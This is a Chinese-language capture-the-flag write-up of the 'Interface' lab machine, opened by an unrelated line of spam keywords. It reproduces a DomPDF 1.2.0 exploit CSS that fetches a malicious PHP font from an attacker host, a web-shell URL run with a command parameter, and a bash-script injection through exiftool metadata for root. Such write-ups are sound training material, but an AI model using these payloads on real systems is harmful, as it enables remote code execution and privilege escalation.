成品网站怎样建设,网络营销方式给消费者消费行为模式带来的影响,南充市房地产网官网,营销网站做推广Interface
Interface 是一种中等难度的 Linux 机器#xff0c;具有“DomPDF”API 端点#xff0c;该端点通过将“CSS”注入处理后的数据而容易受到远程命令执行的影响。“DomPDF”可以被诱骗在其字体缓存中存储带有“PHP”文件扩展名的恶意字体#xff0c;然后可以通过从其…Interface
Interface 是一种中等难度的 Linux 机器具有“DomPDF”API 端点该端点通过将“CSS”注入处理后的数据而容易受到远程命令执行的影响。“DomPDF”可以被诱骗在其字体缓存中存储带有“PHP”文件扩展名的恶意字体然后可以通过从其公开的目录访问它来执行它。权限提升涉及在 bash 脚本中滥用带引号的表达式注入。 外部信息收集
端口扫描
循例nmap Web枚举 在响应头中能看到它的域名 ffuf /api端点 这里html转成了pdf Foothold
在pdf中纰漏了dompdf 1.2.0 在谷歌中能够找到该版本存在问题并且github上还有exp
https://github.com/positive-security/dompdf-rce
从exp的exploit.css也就不难看出大概是怎么回事了
font-face {font-family:exploitfont;src:url(http://10.10.14.18:9001/exploit_font.php);font-weight:normal;font-style:normal;}改一下exploit_font.php 打exp,目标将会缓存我们的字体文件 获取字符串md5用于缓存文件名的组成 9001还是用python3开http server才能正常 访问文件
http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_b82f3437a14b588f9bc8cdb2cd1baaf2.php?cmdid常规python3 reverse shell 本地权限提升
传个pspy过去发现有shell脚本在跑 #! /bin/bash
cache_directory/tmp
for cfile in $cache_directory/*; doif [[ -f $cfile ]]; thenmeta_producer$(/usr/bin/exiftool -s -s -s -Producer $cfile 2/dev/null | cut -d -f1)if [[ $meta_producer -eq dompdf ]]; thenecho Removing $cfilerm $cfilefifidone使用exiftool读取Producer信息然后判断它是否等于dompdf
这篇文章告诉我们这个shell代码可能会导致插入恶意shell命令并且被执行
if [[ $meta_producer -eq dompdf ]];首先写一个shellcode或者其他的命令文件 通过exiftool插入payload然后将文件移动到/tmp 等待计划任务执行我们将能得到它
